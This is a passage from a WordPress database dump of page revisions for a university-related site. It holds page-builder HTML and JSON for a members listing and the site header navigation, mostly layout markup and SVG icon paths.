0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c187-outer\">\n            <div data-colibri-id=\"182-c187\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c187 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c188\" class=\"d-block style-913 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c188-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c188-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-global-transition-all h-heading style-914 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c189\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"h-text h-text-component style-915 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c191\" class=\"style-917 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',182,'https://gsudice.dataconn.net/?p=1650',0,'revision','',0),(1651,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',26,'https://gsudice.dataconn.net/?p=1651',0,'revision','',0),(1652,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 